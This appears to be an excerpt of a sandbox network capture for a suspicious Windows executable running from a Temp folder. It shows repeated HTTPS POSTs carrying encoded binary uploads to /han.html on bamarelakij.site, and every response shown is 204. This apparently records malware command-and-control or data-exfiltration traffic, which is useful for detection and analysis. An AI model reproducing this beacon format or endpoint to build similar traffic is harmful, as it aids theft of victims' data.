2025-01-09 13:56:56 UTC	15331	OUT	Data Raw: 23 a1 33 24 35 34 37 b6 32 95 1c 3b bc 1b 18 9b 97 1a 98 38 95 99 b7 a2 b8 b2 36 33 25 2b b1 b8 3a b8 26 b0 b9 2a 3c 39 24 2d 1b 29 36 27 31 b0 a4 b2 34 a9 35 b5 2d 21 2d 33 9a 31 3d a7 28 1a 2d 95 a2 9c 35 ba b9 b6 a0 33 a1 a1 2c 3d a8 3d b1 9c b7 25 a8 b4 1a 1b 2d 98 1b 99 a8 23 31 24 a2 29 a5 34 b7 b1 34 29 b7 a8 23 9c 9c ba a8 9c a8 1c a4 1b 24 a5 1a 2a 29 9b a5 26 2a 22 bc bc 2a 99 9a b2 99 b3 bc ba a7 a3 34 34 26 3b 2a b6 3b ab b7 b7 1b 3d 18 aa 28 21 a7 1c 21 1b 3b 1c 99 9c 23 25 9b 1a 23 b8 9c 99 a2 aa a6 25 a2 b4 34 21 b3 b7 1c bc a1 24 25 21 b3 b7 1c 3c a1 28 25 21 b3 39 b9 2d 21 a4 aa b3 bb 2a 18 a6 b3 b6 a5 a8 1a a7 a6 a6 b3 b9 a2 b3 bb a9 b1 ac 21 a5 aa b3 bb a9 b1 2d 21 a2 27 21 b3 b5 95 9a 21 22 3b 21 34 b7 1b b4 a6 b5 a3 a5 b2 98 b5 aa 36 Data Ascii: #3$5472;863%+:&<9$-)6'145-!-31=(-53,==%-#1$)44)#$)&"44&;;=(!!;#%#%4!$%!<(%!9-!!-!'!!";!46
2025-01-09 13:56:56 UTC	15331	OUT	Data Raw: ac 1b a4 38 1c 36 29 25 95 95 aa aa 35 b1 a4 3d bc b5 27 ac 21 b0 19 3d 25 2c 37 3d 1a 38 23 b1 b9 21 25 a7 b1 b2 a6 b5 ba b6 1b b1 a5 34 3d 39 38 98 32 ba 3d 21 2a 37 a2 3a 19 36 98 b8 36 9c a4 98 aa 9b 33 37 b5 a1 97 39 a6 38 26 ac 19 aa 3c b1 23 1c 36 21 31 aa 1b ba ab 2d a8 a9 2d b8 a0 39 9c a9 38 b1 95 a3 a1 24 24 24 a9 38 28 a8 b2 ab 9a b8 28 98 a2 a0 26 ab 99 37 34 ba 97 aa 21 b6 b7 9c 1a b8 1a 1c b9 a5 b9 19 a1 39 31 9c a1 9a 2c a4 a6 98 bc 1c aa 38 b3 3b 33 b1 1a 39 21 b2 b8 a4 1a ac b0 39 b0 18 2c a5 3a b6 29 a4 36 99 b3 1b 3b 24 33 29 1b 37 b7 31 b5 98 b6 2b bb b2 37 2d bc b1 29 2d b5 97 99 19 33 aa b4 1a a5 35 a8 2a 1a ba aa 22 b6 ba b2 aa b3 39 9c 36 23 3c 24 a7 a7 9b b9 a1 a3 1a b1 9c b6 3a b4 3d b5 34 19 2a b0 bc 28 34 31 b9 b6 9a b9 ac 2a Data Ascii: 86)%5='!=%,7=8#!%4=982=!7:663798&<#6!1--98$$$8((&74!91,8;39!9,:)6;$3)71+7-)-35"96#<$:=4(41
2025-01-09 13:56:56 UTC	15331	OUT	Data Raw: 23 33 2a 39 a6 27 b6 24 36 aa 21 37 26 19 35 9b a4 a9 b5 3d 21 19 34 22 19 aa b5 b2 27 28 ac 2c 18 a7 a8 1c 29 3b b0 9a 9b 98 b7 a4 25 34 2c a6 1b 28 b0 1b 9b b6 22 18 a5 a2 1b a9 b6 28 32 ba 29 b7 9c b9 34 22 3d a1 9b 98 ac a4 19 9c b3 99 19 21 ba 9b 95 35 ac ba 39 a6 b3 ac a3 2c 31 ba ac 2b 34 3c 95 1c 34 a7 95 99 b0 a3 23 a9 9b a8 b1 a3 b9 24 b3 bc 1b 2b 9b bc a7 9b 23 b7 bb 36 97 a8 2c 32 ab 26 aa 2c a4 b8 37 b8 39 39 9a 98 97 27 a4 35 34 23 a0 28 a6 2d 98 36 1b 3b b4 b4 26 a7 a0 23 b8 24 3d b4 2a a4 3d 9c a8 97 98 2d 34 a7 3b 97 1a 33 38 97 ba 28 1a 33 39 3b 95 24 1b 97 97 34 95 37 95 1a 97 34 95 ba 97 1a 33 39 97 95 24 1b 33 9b 35 95 24 1b 9b 97 34 95 3b 97 1a 33 38 97 ba 28 1a 33 39 3b 95 24 1b 97 97 34 95 37 95 1a 97 34 95 ba 97 1a 33 39 97 95 24 Data Ascii: #39'$6!7&5=!4"'(,);%4,("(2)4"=!59,1+4<4#$+#6,2&,799'54#(-6;&#$==-4;38(39;$47439$35$4;38(39;$47439$
2025-01-09 13:56:56 UTC	15331	OUT	Data Raw: aa 1b aa 36 b9 bb 9c 24 b0 97 2d 2d 19 23 99 32 1b b9 ac b4 b6 26 a1 36 39 23 2d 1b a3 36 b8 24 b4 99 95 ab 9c 38 29 37 1c 2a 35 a1 a1 b4 b0 25 ba 23 29 2a 21 a5 bb 99 a1 18 a2 2c 33 22 29 a7 3c 3a 1b ab aa b5 a3 a4 33 99 b4 18 ac 28 3c 97 33 a0 29 3c a6 19 21 a6 b1 35 22 95 32 23 a6 2a b4 a5 b5 9b 37 a1 2d 2c 97 b9 b5 22 a6 1c b7 3a 23 b7 b5 bc b7 b6 a1 a2 39 b4 a8 1b 9a 3d aa aa 27 b6 97 31 22 1a b7 29 25 24 a3 19 3d b7 28 b0 35 21 32 35 26 a6 99 31 1b a8 a4 29 36 a2 b4 b9 9c a5 a7 24 b0 a2 2a 1b 31 b1 b1 b4 28 1a 2a 38 b1 31 a2 a9 a7 99 99 a4 29 bb bc b4 25 a7 24 25 3c b3 a2 38 9c a2 b4 b7 2b b8 a0 b0 97 a4 23 2d 25 ac 3b ac b7 19 37 19 b8 27 a3 29 aa 97 37 99 a2 27 a9 1c ab 35 ac b7 23 a3 b3 18 2a 22 1a b4 ba 38 19 a3 24 3c a1 37 1c 28 37 3b ab 26 ba Data Ascii: 6$--#2&69#-6$8)75%#)!,3")<:3(<3)<!5"2#7-,":#9='1")%$=(5!25&1)6$1(81)%$%<8+#-%;7')7'5#"8$<7(7;&
2025-01-09 13:56:56 UTC	15331	OUT	Data Raw: 2d bb 9a 23 39 a0 2d 25 a1 ac b5 2b 2c 3d 21 9c a6 36 a2 a9 25 9c 1a ab 9a a0 31 9c 9a 26 18 3d 21 9c 37 29 21 a4 1c 38 19 38 2c bc a2 25 22 99 a4 b7 2c b3 bb 3b 35 b7 19 22 97 1a b8 31 ab b1 35 b3 33 2b 9c a0 98 98 a9 26 18 b9 1b b3 ab 1a a6 b3 2b 24 38 27 1c a6 b2 b1 18 31 98 3b b6 26 a2 b3 b4 b7 a5 b3 23 a9 a8 a8 21 31 18 a2 a9 b3 bc 29 24 a4 b4 19 1b b2 35 a3 3a a2 32 b9 a0 21 24 b1 18 b6 1b a1 32 a9 19 1a b1 a1 36 a9 9c 29 a5 34 bc 28 a1 b7 19 25 b8 b4 a9 b4 98 bc 34 b6 38 b9 b7 2b 27 a0 2d 29 ba a9 22 b4 3c 2b ba 28 3d 22 b5 b6 b1 27 9a 24 2c 3c 21 31 2b 99 29 b1 a5 2d b9 29 aa a6 35 a1 95 1c 24 b0 26 a0 3a 9c bc b3 1b 1b 3b 25 2c 21 9b 3a 1c 99 36 a7 3a 29 a7 23 1a 9c 36 32 21 a5 b8 b1 a0 b7 33 b7 36 a1 38 29 2c 3b 18 29 29 b4 3a aa 3b b1 32 34 bc Data Ascii: -#9-%+,=!6%1&=!7)!88,%",;5"153+&+$8'1;&#!1)$5:2!$26)4(%48+'-)"<+(="'$,<!1+)-)5$&:;%,!:6:)#62!368),;)):;24
2025-01-09 13:56:56 UTC	15331	OUT	Data Raw: 9c 95 32 b0 2c a0 a6 2c a0 28 38 a4 9c 3c 3a b5 18 2b b1 bc 2a bc a1 a4 a5 2b 3a 23 2d 9c ba ba 18 bc 34 b2 b8 3a b0 39 9b 32 2b b4 3d a9 ac 27 2d b5 9a ba 37 2b a0 b9 2a b4 b6 b1 b1 25 34 34 29 99 b6 b0 99 aa ab 1a a3 24 3d 1c 3c a2 a9 a7 3b 1a 3b 37 21 a7 b5 a3 ab 21 9a aa ba b8 9c 31 25 9a 28 39 39 2d a7 32 b8 35 b1 19 a8 3c 22 b6 2a 35 22 99 19 a8 b0 bb 3b 1b b2 9a ac 9a 36 27 35 a6 a1 32 b2 9a bc 9a 99 19 37 2c 26 3d bc 26 34 b9 b6 29 34 3b a8 b1 19 9a 28 b1 19 24 9a ba 9c 26 b7 ac 95 99 ba 29 29 a2 aa a9 23 aa 37 aa ba b4 2c b8 a5 27 3a 26 a2 a6 1c 27 3b 32 26 b9 b4 9c 2d 97 19 b2 33 39 b2 24 3c 95 ba 34 9c b0 19 ac 9a 24 b5 31 28 9a 2c b3 22 33 99 3c 97 3c 33 b1 2a 99 b6 1c 35 99 39 19 aa b2 1b a1 2b b4 b9 38 36 a6 1a 31 b6 2d 37 a8 33 95 98 97 a6 Data Ascii: 2,,(8<:++:#-4:92+='-7+%44)$=<;;7!!1%(99-25<"5";6'527,&=&4)4;($&))#7,':&';2&-39$<4$1(,"3<<359+861-73
2025-01-09 13:56:56 UTC	15331	OUT	Data Raw: 39 35 a2 3c 19 b0 27 a0 a8 b5 a9 36 b5 a0 b2 1a 25 ba a0 b1 b8 b6 3b 35 35 1a 24 a4 32 3d a0 a3 25 98 b4 29 21 a6 21 23 26 a0 bc 25 2b b9 99 a1 21 b7 b0 a9 a0 a0 a8 27 ba a6 a9 b3 a3 a1 bc 2a 22 b4 a8 26 a1 21 21 27 a7 22 b1 a8 a9 22 2a a6 a8 33 ba a1 27 31 a5 26 a0 2c a8 2c 95 a7 a6 a4 23 b4 25 32 34 33 34 29 1a b8 a5 b7 a6 18 29 2b a9 b6 a0 ab b4 27 36 18 bb 22 22 a7 33 a4 1c 1a a6 19 29 2b 21 a8 25 b2 22 a1 ac 2d ab 3d bc b3 b4 3a a5 a9 b5 2d 32 a0 a8 28 b4 b7 1b b0 2a 37 a2 a9 a4 34 3a b2 2c b3 3b b6 21 b0 1b b3 39 3a 9a 21 27 1a b4 33 22 b2 1a 29 b8 b5 b1 98 21 3a 1a a0 b1 38 2a aa b1 a0 99 a6 27 bb a1 ac 37 31 a4 37 b6 a2 a4 a6 34 a8 9b 31 a5 a6 a3 21 a1 b4 38 24 25 a2 23 a7 a3 2d b3 b0 37 35 b8 a6 36 a3 27 b1 23 ba b3 a0 35 ab bc 31 b1 a6 21 2c 99 Data Ascii: 95<'6%;55$2=%)!!#&%+!'"&!!'""3'1&,,#%2434))+'6""3)+!%"-=:-2(74:,;!9:!'3")!:8'71741!8$%#-756'#51!,
2025-01-09 13:56:56 UTC	15331	OUT	Data Raw: b3 2b a5 29 b1 2c aa 21 2d b8 a2 a9 18 35 23 2b 32 9a 28 bc 38 37 2a a5 19 26 bc b1 a4 a7 2d ba aa 2b 95 1c a2 b0 bc a8 26 1c 97 b3 b9 a6 97 a6 34 a6 b9 a0 3b 22 b2 a3 a4 9b b1 1a 37 27 b5 a5 98 36 2d a6 27 a9 39 3d 9a 27 2a 35 3d 3d a9 28 9c 1b 95 95 a6 b8 2a a0 2d 1b b1 ba 2c 22 25 36 31 b9 3a 3a 2c 2d 28 34 b7 a2 3b 26 2c a6 28 25 35 a6 b6 22 a0 19 a5 99 39 a7 a8 a0 b2 b6 38 18 b2 9a a6 24 a4 3b b4 b9 a0 b8 2a b9 ab 2d 34 98 36 97 1a bc 99 b8 28 ba a1 19 99 ab 19 98 1b a9 3c 32 b3 3d 37 33 a7 22 27 95 3c b8 35 97 b2 1b a5 1c 33 a3 ab 1b a2 2a 32 bc b3 28 21 3d 2d 27 32 3b 22 9b 38 b7 3c 28 2b 19 27 97 aa 3d 2a 2b a4 19 a2 97 aa 3d 35 35 24 24 34 95 25 a2 35 9b b8 28 a6 a9 36 26 98 b5 32 ac 2d 1a 99 35 b9 b3 b4 a2 3d ba 28 a8 2b 28 a0 ac 18 ac a8 ab 28 Data Ascii: +),!-5#+2(87&-+&4;"7'6-'9='5==(-,"%61::,-(4;&,(%5"98$;-46(<2=73"'<532(!=-'2;"8<(+'=+=55$$4%5(6&2-5=(+((
2025-01-09 13:56:57 UTC	740	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:56:57 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DKNI%2BjiHiAqod21lXJR811jSC6T%2B6XsTOqIcPeX%2BphthAOA6NgB1Z99h5EsIaZ1S5UHSQXPr6cReAowMm2Ws%2BQuOVvHl2KjxOYvcFBP%2FAFitxbR7KdpJGxN%2FFnDDQ6eUuN9W"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4eefd9b235e79-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6987&min_rtt=1649&rtt_var=3944&sent=375&recv=695&lost=0&retrans=0&sent_bytes=2838&recv_bytes=687854&delivery_rate=1770770&cwnd=225&unsent_bytes=0&cid=86051cd9ece2fc7f&ts=1057&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.10	50097	172.67.174.91	443	6996	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:58 UTC	426	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 745 Host: bamarelakij.site
2025-01-09 13:56:58 UTC	745	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 8c 8e 68 35 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 46 47 34 9a 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 46 47 34 9a 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff a7 00 00 00 08 00 00 00 52 00 00 00 b6 ea 41 13 95 a7 40 16 d7 35 c9 59 8a 00 00 00 00 00 00 00 00 00 00 00 5b 75 a0 89 49 60 49 ca 60 01 80 d1 49 60 00 50 ca 60 80 80 d1 49 60 00 50 31 00 Data Ascii: Rh5@5YFG4I`H1FG4(((RA@5Y[uI`I`I`P`I`P1
2025-01-09 13:56:58 UTC	730	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:56:58 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Allj%2B0xeRdGvGHIykZaT8EBrFG2Zz%2BhySEkML%2FHSogPbXsLZ0GXa4C26OApVqL50CAG6xa%2Fa2vnvthjQ6jE1ty%2BF6HpXRSBkaMh6gWE2eGScWpdLaJNi58U3D17pTJIASntb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ef08c9104211-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2398&min_rtt=1729&rtt_var=1987&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1807&delivery_rate=412254&cwnd=239&unsent_bytes=0&cid=695d73adf7d63794&ts=242&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.10	50098	172.67.174.91	443	6996	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:59 UTC	426	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 212 Host: bamarelakij.site
2025-01-09 13:56:59 UTC	212	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 99 00 00 00 08 00 00 00 52 00 00 00 6f d2 a9 18 95 a7 40 16 d7 35 c9 59 83 00 00 00 00 00 00 00 00 00 00 00 b7 69 d4 0c c9 60 60 49 60 c8 00 31 00 00 00 00 00 00 00 00 00 00 00 b7 69 d4 0c 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: Ro@5Yi``I`1i(((
2025-01-09 13:56:59 UTC	722	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:56:59 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QMiQIlaLcr4e1jIt1wpFKrUWc09OL%2Fa1QZHlbdawVqLF0lbHdYcZF0GH9EfQ9930swSz33kVUYZSvKDPlxexjtR6J7Bj0W7nC0GQ3JV4q9DEp6iSU8DdNZ1xZU7YCz7MeNyM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ef0e1d050c90-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1693&rtt_var=674&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1274&delivery_rate=1724748&cwnd=210&unsent_bytes=0&cid=76ec2d4b04cba9b1&ts=314&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.10	50099	172.67.174.91	443	6996	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:57:00 UTC	426	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 380 Host: bamarelakij.site
2025-01-09 13:57:00 UTC	380	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 f5 31 4e 30 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 fa 98 27 18 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 fa 98 27 18 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 94 00 00 00 08 00 00 00 52 00 00 00 8e 36 1e 13 95 a7 40 16 d7 35 c9 59 01 00 00 00 00 00 00 00 00 00 00 00 47 1b 0f 89 c8 48 31 00 00 00 00 00 00 00 00 00 00 00 47 1b 0f 89 28 a5 03 03 16 Data Ascii: R1N0@5Y'I`H1'(((R6@5YGH1G(
2025-01-09 13:57:00 UTC	728	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:57:00 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f47q6t5t7%2F44vA%2BLpJwOIgWLsDolXsB5xGDpvPEN74BeSIyQ4iDDmsUAhSOblBVYrCcO6JExzW10OBfwTRCBRqw%2BXtLg53KEQ9RoHInz2RknxR4xC0ng8AAcq%2BzqLbMqgrO2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ef138e088c6c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=2008&rtt_var=778&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1442&delivery_rate=1384542&cwnd=168&unsent_bytes=0&cid=9a32b73fb38a246b&ts=332&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.10	50100	172.67.174.91	443	6996	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:57:01 UTC	428	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 78289 Host: bamarelakij.site
2025-01-09 13:57:01 UTC	15331	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 96 31 01 00 08 00 00 00 52 00 00 00 3a eb 68 36 95 a7 40 16 d7 35 c9 59 02 00 00 00 00 00 00 00 00 00 00 00 1d f5 34 1b c9 60 00 48 31 98 80 00 00 00 00 00 00 00 00 00 1d f5 34 1b 28 a5 81 02 96 00 00 04 04 00 ec 0a 1c ab ec 8e 95 5c ff ff ff ff ff ff ff ff 8d 00 0a 00 a3 39 b0 31 31 b2 39 2e 32 b2 b9 2e 21 27 a0 a3 a6 a3 a9 28 26 a7 17 32 b7 b1 3c 80 00 08 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 80 01 02 fe fd 21 27 a0 a3 a6 a3 a9 28 26 a7 a8 27 a5 26 2b a8 ab ac ac ab ac a3 22 2a 27 a4 24 24 28 a9 a3 a5 ac 21 27 21 27 a3 23 a9 2d a3 ac ac 23 aa 2b 27 a9 a7 ac 2a a0 a6 2d 28 a7 a4 a7 a5 a6 23 23 ab 22 25 a4 ac a1 25 a3 2a ab 2d a9 a6 2c a0 22 21 a9 25 22 a2 a5 22 2a 28 2c 22 2b ac 21 a4 Data Ascii: 1R:h6@5Y4`H14(\9119.2.!'(&2<!'(&'&+"'$$(!'!'#-#+'-(##"%%-,"!%""(,"+!
2025-01-09 13:57:01 UTC	15331	OUT	Data Raw: a9 23 a1 21 a8 2a 24 a1 23 ac 2d a3 a9 2b 2b a0 aa 28 26 a8 a2 26 29 ab 26 2c 29 a1 2d a9 aa a9 23 aa 21 a1 a7 29 a1 ab a6 25 28 aa 27 24 2a a2 a2 ac a7 22 a9 23 a3 25 23 2a 22 2d 26 26 2c a6 a8 ac a6 a4 24 a4 2d 2c a7 ac a3 a0 21 a4 a0 ab ac a9 21 ab 26 a0 25 a9 a1 a5 21 ab a3 25 21 2b a6 a6 25 a5 21 a5 26 aa 24 aa 26 25 a4 aa 24 a8 2c a4 2c a2 a9 a0 aa 2a 27 2b 2b 2d 27 a5 a6 a4 2b a4 a7 24 28 28 a8 a0 ab 2a a8 a9 a2 24 2a a8 a6 a4 ab 27 28 29 2d 29 a2 2a 2c 2d 24 29 a3 ab a7 2a a3 a4 a2 24 a1 a1 a9 a3 a4 aa a1 a5 a1 a4 23 a1 a8 28 2a a0 25 a7 23 a1 a4 a6 ac a9 a6 a1 a7 28 a3 a0 a9 a2 a2 ac a1 27 a8 26 2c a1 27 29 a0 28 a8 aa a9 a8 2c 2a ab 28 a5 28 ac a1 a8 2c 28 a2 a1 a4 2a 29 29 a5 ac 27 a1 2d 21 a3 aa 24 21 22 a9 a9 a9 21 ac 2b 21 27 86 05 28 a5 81 Data Ascii: #!$#-++(&&)&,)-#!)%('$"#%#"-&&,$-,!!&%!%!+%!&$&%$,,'++-'+$(($'()-),-$)$#(%#('&,')(,((,(*))'-!$!"!+!'(
2025-01-09 13:57:01 UTC	15331	OUT	Data Raw: 29 26 a6 a0 27 a9 27 2b 27 a0 ac 24 26 a2 27 a7 ab aa a2 2a 21 24 26 aa 26 aa 2c 26 22 aa a4 aa ab 24 22 2a a9 21 2a 2c ac a0 21 2d aa 28 a2 2b 27 aa 2a ac 22 a4 ac a7 ab 2c 2d a8 a8 ab 2d 2a a4 a5 24 29 a0 a1 a9 ab ac a4 26 2d a3 25 25 a0 ac 28 2c a9 ab 2b a0 25 a2 a0 a6 ab 29 ab aa ab a4 a7 a7 27 aa a3 a9 a7 ab 2a 27 ab 2b a4 26 21 2a 29 ac ab 2c 28 a9 a3 a3 25 ac a2 2a 2a a8 a4 a1 a1 2a a8 a6 a7 a7 29 a9 2d a2 27 28 aa 26 21 a2 a8 a7 21 a9 27 22 ab 25 24 23 a3 2d a7 2c a0 ac 29 a6 29 2a a1 a8 a0 a3 2d 23 a5 26 2a 2c a8 25 a1 a5 a5 a5 25 2a 2c 29 a4 a4 2b 21 ac a9 ab 29 23 23 a9 22 ab 26 a0 ab a2 2b 2d 27 23 2b 25 a4 ac a0 a5 a3 a7 23 a4 a5 a3 a5 28 a0 26 ac a5 26 aa a9 23 aa 2d 27 2c 21 2a 2a a3 25 a8 a0 29 26 25 26 a2 28 27 a6 aa 28 2d 21 24 aa 23 a2 Data Ascii: )&''+'$&'!$&&,&"$"!,!-(+'",--$)&-%%(,+%)''+&!),(%*)-'(&!!'"%$#-,))-#&,%%,)+!)##"&+-'#+%#(&&#-',!**%)&%&('(-!$#
2025-01-09 13:57:01 UTC	15331	OUT	Data Raw: ac aa ab 23 a9 a7 23 a3 a8 a1 23 21 23 2d 24 a8 a6 22 ab 29 a5 28 23 2b 27 28 22 a3 a8 22 a0 2c ac ab 28 a8 a2 27 ac 28 2b a1 a5 28 25 2a 24 a0 a7 2c 29 26 2b a6 27 23 a4 a7 25 21 2b 23 ab a0 27 21 a1 a7 2a 21 a2 27 2a 23 2b a8 2d a1 23 21 23 22 21 a6 a8 aa 24 a1 a1 a1 24 a6 a6 a8 aa a7 ab a9 21 a1 2d ac a0 a1 2b a1 27 25 23 a8 a5 aa a1 a7 a6 24 a3 2b 27 a3 a3 2b 22 a0 a1 aa 24 a6 aa ac 26 25 2d a8 a0 a5 aa 27 a6 a4 a9 a4 29 29 2d ab 22 a5 21 a5 a9 a1 28 a8 a2 2d 25 21 24 ac a7 2d 2d a0 2c 25 2b 21 24 28 23 2d 27 22 2c 2b 24 a3 ab 24 27 a9 2b ab a6 ac 2d ab 29 2b a4 22 2a aa a1 a2 a7 28 2d 2d 29 22 2b 24 2a 2d a5 ab 24 a0 2a 26 aa 24 21 22 25 a9 22 ab 26 a1 2c a8 27 2c a7 ab ac aa 22 a8 a3 2d 25 a5 a1 a0 2c 22 2a a4 2b 2c 2a 21 a1 a8 ac 24 22 a5 a1 a0 a0 Data Ascii: ###!#-$")(#+'("",('(+(%$,)&+'#%!+#'!!'#+-#!#"!$$!-+'%#$+'+"$&%-'))-"!(-%!$--,%+!$(#-'",+$$'+-)+"(--)"+$-$&$!"%"&,',"-%,"+,!$"
